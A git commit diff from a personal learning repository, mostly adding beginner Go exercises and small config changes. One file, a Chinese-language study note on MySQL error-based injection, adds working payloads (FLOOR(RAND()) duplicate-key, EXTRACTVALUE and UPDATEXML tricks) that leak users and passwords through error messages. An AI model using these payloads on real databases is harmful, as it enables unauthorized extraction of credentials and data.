]> Zhao Yanbai Git Server - acecode.git/commitdiff
learn go
authoracevest <zhaoyanbai@126.com>
Sat, 14 Nov 2015 05:55:53 +0000 (13:55 +0800)
committeracevest <zhaoyanbai@126.com>
Sat, 14 Nov 2015 05:55:53 +0000 (13:55 +0800)
13 files changed:
documents/MySQLInjection.md
learn/doc/GitHub2.Ace.css [deleted file]
learn/doc/mac_bash_profile
learn/go/array.slice.map.go [new file with mode: 0644]
learn/go/for.go [new file with mode: 0644]
learn/go/hello.go [moved from learn/go/hello/hello.go with 84% similarity]
learn/go/hello/array.go [deleted file]
learn/go/hello/struct.1.go [deleted file]
learn/go/hello/switch.1.go [deleted file]
learn/go/if.go [new file with mode: 0644]
learn/go/struct.go [new file with mode: 0644]
learn/go/switch.go [new file with mode: 0644]
tools/comm/cs

index 8f0125d660ca6e7ec710637d9693972ebc7d9c46..125fdaf79ccd9f975b473a6eed26ff96914a6891 100644 (file)
@@ -127,4 +127,16 @@ else {
 ```
 本代码的特点是不会在网页上输出任何字段值。
 ###2.注入思路
-由于程序代码并不在网页上显示任何字段,因此我们如果想要得到数据库的一些信息得另外想办法。有一个方法是利用程序执行SQL时产生的错误会显示到网页上这一点,将要显示的信息嵌入错误信息里。对于MySQL利用的模板代码为```select count(*), CONCAT(CURRENT_USER(), FLOOR(RAND(0)*2)) x from information_schema.tables group by x;```会得到类似```ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'```的错误提示。
\ No newline at end of file
+由于程序代码并不在网页上显示任何字段,因此我们如果想要得到数据库的一些信息得另外想办法。有一个方法是利用程序执行SQL时产生的错误会显示到网页上这一点,将要显示的信息嵌入错误信息里。对于MySQL利用的模板代码为```SELECT COUNT(*), CONCAT(CURRENT_USER(), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x;```会得到类似```ERROR 1062 (23000): Duplicate entry 'sqli@localhost1' for key 'group_key'```的错误提示。经典的MySQL报错代码还有
+
+* ```SELECT 1,2 UNION SELECT COUNT(*), CONCAT(CURRENT_USER(), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x;```
+* ```SELECT COUNT(*) FROM (SELECT 1 UNION SELECT NULL UNION SELECT !1) GROUP BY CONCAT(CURRENT_USER(), FLOOR(RAND(0)*2))```
+* 如果RAND被禁,可以使用用户变量来报错 ```SELECT MIN(@a:=1) FROM information_schema.tables GROUP BY CONCAT(password, @a:=(@a+1)%2)```
+
+在mysql 5.1版本中加入了两个XML函数,也可以用来报错
+
+* ```mysql> SELECT * FROM users WHERE id=1 AND EXTRACTVALUE(1, CONCAT(0x5C, (SELECT username FROM users LIMIT 1)));
+ERROR 1105 (HY000): XPATH syntax error: '\Dumb'```
+* ```mysql> SELECT * FROM users WHERE id=1 AND 1=(UPDATEXML(1, CONCAT(0x5E24, (SELECT password FROM users LIMIT 1), 0x5E24), 1));
+ERROR 1105 (HY000): XPATH syntax error: '^$Dumb^$'```
+
diff --git a/learn/doc/GitHub2.Ace.css b/learn/doc/GitHub2.Ace.css
deleted file mode 100755 (executable)
index 5860b73..0000000
+++ /dev/null
@@ -1,307 +0,0 @@
-body {
-  font-family: Helvetica, arial, sans-serif;
-  font-size: 14px;
-  line-height: 1.6;
-  padding-top: 10px;
-  padding-bottom: 10px;
-  background-color: white;
-  padding: 30px; }
-
-body > *:first-child {
-  margin-top: 0 !important; }
-body > *:last-child {
-  margin-bottom: 0 !important; }
-
-a {
-  color: #4183C4; }
-a.absent {
-  color: #cc0000; }
-a.anchor {
-  display: block;
-  padding-left: 30px;
-  margin-left: -30px;
-  cursor: pointer;
-  position: absolute;
-  top: 0;
-  left: 0;
-  bottom: 0; }
-
-h1, h2, h3, h4, h5, h6 {
-  margin: 20px 0 10px;
-  padding: 0;
-  font-weight: bold;
-  -webkit-font-smoothing: antialiased;
-  cursor: text;
-  position: relative; }
-
-h1 {
-  text-align: center;}
-
-h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
-  background: url() no-repeat 10px center;
-  text-decoration: none; }
-
-h1 tt, h1 code {
-  text-align:center;
-  font-size: inherit; }
-
-h2 tt, h2 code {
-  font-size: inherit; }
-
-h3 tt, h3 code {
-  font-size: inherit; }
-
-h4 tt, h4 code {
-  font-size: inherit; }
-
-h5 tt, h5 code {
-  font-size: inherit; }
-
-h6 tt, h6 code {
-  font-size: inherit; }
-
-h1 {
-  font-size: 28px;
-  color: black; }
-
-h2 {
-  font-size: 24px;
-  border-bottom: 1px solid #cccccc;
-  color: black; }
-
-h3 {
-  font-size: 18px; }
-
-h4 {
-  font-size: 16px; }
-
-h5 {
-  font-size: 14px; }
-
-h6 {
-  color: #777777;
-  font-size: 14px; }
-
-p, blockquote, ul, ol, dl, li, table, pre {
-  margin: 15px 0; }
-
-p {
-  text-indent: 2em;
-}
-
-hr {
-  background: transparent url() repeat-x 0 0;
-  border: 0 none;
-  color: #cccccc;
-  height: 4px;
-  padding: 0;
-}
-
-body > h2:first-child {
-  margin-top: 0;
-  padding-top: 0; }
-body > h1:first-child {
-  margin-top: 0;
-  padding-top: 0; }
-  body > h1:first-child + h2 {
-    margin-top: 0;
-    padding-top: 0; }
-body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
-  margin-top: 0;
-  padding-top: 0; }
-
-a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
-  margin-top: 0;
-  padding-top: 0; }
-
-h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
-  margin-top: 0; }
-
-li p.first {
-  display: inline-block; }
-li {
-  margin: 0; }
-ul, ol {
-  padding-left: 30px; }
-
-ul :first-child, ol :first-child {
-  margin-top: 0; }
-
-dl {
-  padding: 0; }
-  dl dt {
-    font-size: 14px;
-    font-weight: bold;
-    font-style: italic;
-    padding: 0;
-    margin: 15px 0 5px; }
-    dl dt:first-child {
-      padding: 0; }
-    dl dt > :first-child {
-      margin-top: 0; }
-    dl dt > :last-child {
-      margin-bottom: 0; }
-  dl dd {
-    margin: 0 0 15px;
-    padding: 0 15px; }
-    dl dd > :first-child {
-      margin-top: 0; }
-    dl dd > :last-child {
-      margin-bottom: 0; }
-
-blockquote {
-  border-left: 4px solid #dddddd;
-  padding: 0 15px;
-  color: #777777; }
-  blockquote > :first-child {
-    margin-top: 0; }
-  blockquote > :last-child {
-    margin-bottom: 0; }
-
-table {
-  padding: 0;border-collapse: collapse; }
-  table tr {
-    border-top: 1px solid #cccccc;
-    background-color: white;
-    margin: 0;
-    padding: 0; }
-    table tr:nth-child(2n) {
-      background-color: #f8f8f8; }
-    table tr th {
-      font-weight: bold;
-      border: 1px solid #cccccc;
-      margin: 0;
-      padding: 6px 13px; }
-    table tr td {
-      border: 1px solid #cccccc;
-      margin: 0;
-      padding: 6px 13px; }
-    table tr th :first-child, table tr td :first-child {
-      margin-top: 0; }
-    table tr th :last-child, table tr td :last-child {
-      margin-bottom: 0; }
-
-img {
-  max-width: 100%; }
-
-span.frame {
-  display: block;
-  overflow: hidden; }
-  span.frame > span {
-    border: 1px solid #dddddd;
-    display: block;
-    float: left;
-    overflow: hidden;
-    margin: 13px 0 0;
-    padding: 7px;
-    width: auto; }
-  span.frame span img {
-    display: block;
-    float: left; }
-  span.frame span span {
-    clear: both;
-    color: #333333;
-    display: block;
-    padding: 5px 0 0; }
-span.align-center {
-  display: block;
-  overflow: hidden;
-  clear: both; }
-  span.align-center > span {
-    display: block;
-    overflow: hidden;
-    margin: 13px auto 0;
-    text-align: center; }
-  span.align-center span img {
-    margin: 0 auto;
-    text-align: center; }
-span.align-right {
-  display: block;
-  overflow: hidden;
-  clear: both; }
-  span.align-right > span {
-    display: block;
-    overflow: hidden;
-    margin: 13px 0 0;
-    text-align: right; }
-  span.align-right span img {
-    margin: 0;
-    text-align: right; }
-span.float-left {
-  display: block;
-  margin-right: 13px;
-  overflow: hidden;
-  float: left; }
-  span.float-left span {
-    margin: 13px 0 0; }
-span.float-right {
-  display: block;
-  margin-left: 13px;
-  overflow: hidden;
-  float: right; }
-  span.float-right > span {
-    display: block;
-    overflow: hidden;
-    margin: 13px auto 0;
-    text-align: right; }
-
-code, tt {
-  margin: 0 2px;
-  padding: 0 5px;
-  white-space: wrap;
-  border: 1px solid #eaeaea;
-  background-color: #f8f8f8;
-  border-radius: 3px; }
-
-pre code {
-  margin: 0;
-  padding: 0;
-  white-space: pre;
-  border: none;
-  background: transparent; }
-code {
-  font-size:9px; }
-
-.highlight pre {
-  background-color: #f8f8f8;
-  border: 1px solid #cccccc;
-  font-size: 13px;
-  line-height: 19px;
-  overflow: auto;
-  padding: 6px 10px;
-  border-radius: 3px; }
-
-pre {
-  background-color: #f8f8f8;
-  border: 1px solid #cccccc;
-  font-size: 13px;
-  line-height: 19px;
-  overflow: auto;
-  padding: 6px 10px;
-  border-radius: 3px; }
-  pre code, pre tt {
-    background-color: transparent;
-    border: none; }
-
-sup {
-    font-size: 0.83em;
-    vertical-align: super;
-    line-height: 0;
-}
-* {
-       -webkit-print-color-adjust: exact;
-}
-@media screen and (min-width: 914px) {
-    body {
-        width: 854px;
-        margin:0 auto;
-    }
-}
-@media print {
-       table, pre {
-               page-break-inside: avoid;
-       }
-       pre {
-               word-wrap: break-word;
-       }
-}
index 08a89dd219854e85621668a5e642f59d252516c0..042b6ee27392ccfceba938b1808f68f57429fd16 100644 (file)
@@ -1,3 +1,7 @@
+#HISTCONTROL=ignoredups  # 连续相同的命令只会记录一次
+#HISTCONTROL=ignorespace # 命令前加空格避免记入历史
+HISTCONTROL=ignoreboth
+
 export PATH=/usr/local/sbin:$PATH
 export PATH="$(brew --prefix homebrew/php/php56)/bin:$PATH"
 export PATH=/Users/Ace/sys/bin:$PATH
@@ -8,4 +12,3 @@ alias ll='ls -lGh'
 alias ls='ls -Gh'
 alias rm='rm -rf'
 alias msf='msfconsole'
-
diff --git a/learn/go/array.slice.map.go b/learn/go/array.slice.map.go
new file mode 100644 (file)
index 0000000..6bdc5fe
--- /dev/null
@@ -0,0 +1,131 @@
+package main
+
+import "fmt"
+
+type Vector struct {
+    x, y uint32
+}
+
+
+// map在使用前必须使用make而不是new来创建,值为nil的map是空的,并且不能赋值
+var Map map[string]Vector
+
+func main() {
+    // [n]T 表示array
+       var array [2]string
+       array[0] = "HELLO"
+       array[1] = "GO"
+
+       fmt.Println(array[0], array[1])
+       fmt.Println(array)
+
+       var a int = 1
+       fmt.Println(a)
+       b := [2]string{"haha", "hehe"}
+       var c [2]string = [2]string{"a", "b"}
+       // ERROR: var c [2]string = {"a", "b"}
+       fmt.Println(b)
+       fmt.Println(c)
+
+
+       // SLICE
+    // []T 表示slice
+    var slice []string
+    fmt.Println("Slice len", len(slice), "cap", cap(slice))
+    // slice 的零值是 `nil`。
+    if slice == nil {
+        fmt.Println("Slice is nil")
+    }
+    slice = array[:]
+    fmt.Println(slice)
+    fmt.Println("Slice len", len(slice), "cap", cap(slice))
+
+    // 清空slice
+    slice = nil 
+    fmt.Println("Slice len", len(slice), "cap", cap(slice))
+
+    // 构造slice
+    S := make([]int, 5/*length*/, 10/*cap*/) // cap >= length
+    fmt.Println("Slice s len", len(S), "cap", cap(S))
+
+       d := []byte{'a', 'b', 'c'}
+       fmt.Println(d)
+       var e []string = []string{"a", "b", "c"}
+
+    // 向slice中添加元素
+    e = append(e, "append:d")
+    e = append(e, "append:e", "append:f")
+
+       for i := 0; i < len(e); i++ {
+               fmt.Println(e[i])
+       }
+
+    // range
+       for i, v := range d {
+               fmt.Println(i, v)
+       }
+
+    // 如果只需要索引值,去掉`value`部分就可以了
+    for i := range(e) {
+        fmt.Println(i)
+    }
+
+    // 如果只需要`value`部分,索引部分可以直接用`_`来忽略
+    for _, v := range(e) {
+        fmt.Println(v)
+    }
+
+
+    if Map == nil {
+        fmt.Println("Map is nil")
+    }
+    Map = make(map[string]Vector)
+    if Map == nil {
+        fmt.Println("Map is nil")
+    } else {
+        fmt.Println("Map is not nil")
+    }
+    Map["LeftTop"] = Vector{0, ^uint32(0)}
+    Map["LeftBottom"] = Vector{0, 0}
+    Map["RightBottom"] = Vector{^uint32(0), 0}
+    Map["RightTop"] = Vector{^uint32(0), ^uint32(0)}
+
+    fmt.Println(Map)
+    fmt.Println(Map["RightTop"])
+    fmt.Println(Map["RightTops"])
+
+
+    var MapA=map[string]string {
+        "Apple"     : "USA",
+        "Google"    : "USA",
+        "Tencent"   : "CHN",
+    }
+
+    fmt.Println(MapA)
+
+    // insert
+    MapA["Test"] = "Unknown"
+    fmt.Println(MapA)
+
+    // modify
+    MapA["Test"] = "USA"
+    fmt.Println(MapA)
+
+    var s string
+    var ok bool
+    s, ok = MapA["Test"]
+    if !ok {
+        fmt.Printf("Key:Test not in\n")
+    } else {
+        fmt.Printf("Key:Test = %s\n", s)
+    }
+
+    // delete
+    delete(MapA, "Test")
+    fmt.Println(MapA)
+
+    _, ok = MapA["Test"]
+    if !ok {
+        fmt.Println("Key:Test not in")
+    }
+}
diff --git a/learn/go/for.go b/learn/go/for.go
new file mode 100644 (file)
index 0000000..a022cdc
--- /dev/null
@@ -0,0 +1,46 @@
+/*
+ * ------------------------------------------------------------------------
+ *   File Name: for.go
+ *      Author: Zhao Yanbai
+ *              2015-11-14 10:31:59 Saturday CST
+ * Description: none
+ * ------------------------------------------------------------------------
+ */
+ package main
+
+ import "fmt"
+ import "time"
+ import "math/rand"
+
+ func main() {
+
+    rand.Seed(time.Now().UnixNano())
+
+     // basic for
+     sum := 0
+     for i:=0; i<10; i++ {
+         sum += i
+     }
+
+     fmt.Println("Sum:", sum)
+
+
+     // 与C语言一样 go 的for 前置、后置条件可以为空
+     sum = 1
+     for ; sum <= 1000; {
+         sum += sum
+     }
+
+     fmt.Println("Sum:", sum)
+
+     // for 也是go的 'while'
+     for sum >= 0 {
+         sum -= rand.Intn(100)
+     }
+
+     fmt.Println("Sum:", sum)
+
+     // 死循环
+     // for {
+     // }
+ }
similarity index 84%
rename from learn/go/hello/hello.go
rename to learn/go/hello.go
index 61438ad26632032813ae3d235bd6aa8e3ddb2c91..8cb18073f5fc517ae66547cef869a3fb92273054 100644 (file)
@@ -60,12 +60,18 @@ var xa, xb, xc = true, "xb", 0xDD
 
 
 func main() {
+    // defer 的参数会立刻生成,但是只是在程序结束时调用
        defer fmt.Println("----------------")
        rand.Seed(time.Now().UnixNano())
+    n := 0
        for i := 0; i < rand.Intn(10)+1; i++ {
                fmt.Println(GetStr())
+        n = i
        }
 
+    // defer 会逆序调用
+    defer fmt.Println("n:", n)
+
        PrintType()
 
     fmt.Println(Add(3, 543))
@@ -101,4 +107,15 @@ func main() {
     // const sd := sa
 
     fmt.Println(BigInt, ConstStr)
+
+
+
+    // 指针, go 语言没有指针运算
+    var pi *int
+    pj := &n
+    pi = pj
+
+    *pj = 123
+
+    fmt.Println(n, *pi, *pj, pi, pj)
 }
diff --git a/learn/go/hello/array.go b/learn/go/hello/array.go
deleted file mode 100644 (file)
index ef03af9..0000000
+++ /dev/null
@@ -1,33 +0,0 @@
-package main
-
-import "fmt"
-
-func main() {
-       var array [2]string
-       array[0] = "HELLO"
-       array[1] = "GO"
-
-       fmt.Println(array[0], array[1])
-       fmt.Println(array)
-
-       var a int = 1
-       fmt.Println(a)
-       b := [2]string{"haha", "hehe"}
-       var c [2]string = [2]string{"a", "b"}
-       // ERROR: var c [2]string = {"a", "b"}
-       fmt.Println(b)
-       fmt.Println(c)
-
-       // SLICE
-       d := []byte{'a', 'b', 'c'}
-       fmt.Println(d)
-       var e []string = []string{"a", "b", "c"}
-
-       for i := 0; i < len(e); i++ {
-               fmt.Println(e[i])
-       }
-
-       for i, v := range d {
-               fmt.Println(i, v)
-       }
-}
diff --git a/learn/go/hello/struct.1.go b/learn/go/hello/struct.1.go
deleted file mode 100644 (file)
index b6bbc7d..0000000
+++ /dev/null
@@ -1,17 +0,0 @@
-package main
-
-import "fmt"
-
-type Vertex struct {
-       X int
-       Y int
-}
-
-func main() {
-       v := Vertex{1, 2}
-       fmt.Println(v)
-
-       p := &v
-       p.X = 2
-       fmt.Println(v)
-}
diff --git a/learn/go/hello/switch.1.go b/learn/go/hello/switch.1.go
deleted file mode 100644 (file)
index 8a10f04..0000000
+++ /dev/null
@@ -1,32 +0,0 @@
-package main
-
-import (
-       "fmt"
-       "runtime"
-       "time"
-)
-
-func main() {
-       fmt.Print("Go runs on ")
-       switch os := runtime.GOOS; os {
-       case "darwin":
-               fmt.Println("OS X.")
-       case "linux":
-               fmt.Println("Linux.")
-       default:
-               // freebsd, openbsd,
-               // plan9, windows...
-               fmt.Printf("%s.", os)
-       }
-
-       t := time.Now()
-       switch {
-       case t.Hour() < 12:
-               fmt.Println("Good morning!")
-       case t.Hour() < 17:
-               fmt.Println("Good afternoon.")
-       default:
-               fmt.Println("Good evening.")
-       }
-
-}
diff --git a/learn/go/if.go b/learn/go/if.go
new file mode 100644 (file)
index 0000000..9c8305e
--- /dev/null
@@ -0,0 +1,35 @@
+/*
+ * ------------------------------------------------------------------------
+ *   File Name: if.go
+ *      Author: Zhao Yanbai
+ *              2015-11-14 10:58:10 Saturday CST
+ * Description: none
+ * ------------------------------------------------------------------------
+ */
+package main
+import (
+    "fmt"
+    "time"
+    "math/rand"
+)
+
+func main() {
+    rand.Seed(time.Now().UnixNano())
+
+    n := rand.Int()
+    if n % 2 == 0 {
+        fmt.Println("Even:", n)
+    } else {
+        fmt.Println("Odd:", n)
+    }
+
+
+    // if 语句在条件之前可以执行一条简单的代码
+    if v := rand.Int(); v % 3 == 0 {
+        fmt.Println(v, " MOD 3 == 0")
+    } else if v % 3 == 1 {
+        fmt.Println(v, " MOD 3 == 1")
+    } else {
+        fmt.Println(v, " MOD 3 == 2")
+    }
+}
diff --git a/learn/go/struct.go b/learn/go/struct.go
new file mode 100644 (file)
index 0000000..1e23335
--- /dev/null
@@ -0,0 +1,26 @@
+package main
+
+import "fmt"
+import "time"
+import "math/rand"
+
+type Vertex struct {
+       X int
+       Y int
+}
+
+func main() {
+    rand.Seed(time.Now().UnixNano())
+
+       v := Vertex{1, 2}
+       fmt.Println(v)
+    fmt.Println(Vertex{0xABC, 0xCBA})
+
+    // 通过指针间隔访问的过程是透明的
+       p := &v
+       p.X = rand.Int()
+    p.Y = rand.Int()
+       fmt.Println(v)
+    v.X, v.Y = p.Y, p.X
+    fmt.Println(v.X, v.Y)
+}
diff --git a/learn/go/switch.go b/learn/go/switch.go
new file mode 100644 (file)
index 0000000..5132c92
--- /dev/null
@@ -0,0 +1,54 @@
+package main
+
+import (
+       "fmt"
+       "runtime"
+       "time"
+    "math/rand"
+)
+
+func main() {
+    rand.Seed(time.Now().UnixNano())
+       fmt.Print("Go runs on ")
+       switch os := runtime.GOOS; os {
+       case "darwin":
+               fmt.Println("OS X.")
+       case "linux":
+               fmt.Println("Linux.")
+       default:
+               // freebsd, openbsd,
+               // plan9, windows...
+               fmt.Printf("%s.", os)
+       }
+
+    // switch 可以没有表达示,将变为一个更清晰的if-then-else的代码结构
+       t := time.Now()
+       switch {
+       case t.Hour() < 12:
+               fmt.Println("Good morning!")
+       case t.Hour() < 17:
+               fmt.Println("Good afternoon.")
+       default:
+               fmt.Println("Good evening.")
+       }
+
+    //fallthrough
+    switch v:=rand.Intn(4); v {
+    case 0:
+        fmt.Println("Level0")
+        fallthrough
+    case 1:
+        fmt.Println("Level1")
+        fallthrough
+    case 2:
+        fmt.Println("Level2")
+        fallthrough
+    case 3:
+        fmt.Println("Level3")
+        fallthrough
+    default:
+        fmt.Println("Ground")
+    }
+
+
+}
index 8d96f310e2bdfca95f724c346fb96af85c395baa..9201fb56900595d2592126db09c1b6080f1ccf94 100755 (executable)
@@ -29,6 +29,7 @@ use constant SSTYLE =>  cmb=>"",
 
 my %s = ("c"        => {CSTYLE},
          "cc"       => {CSTYLE},
+         "go"       => {CSTYLE},
          "cpp"      => {CSTYLE},
          "h"        => {CSTYLE},
          "pl"       => {env=>"#!/usr/bin/env perl\n",   SSTYLE},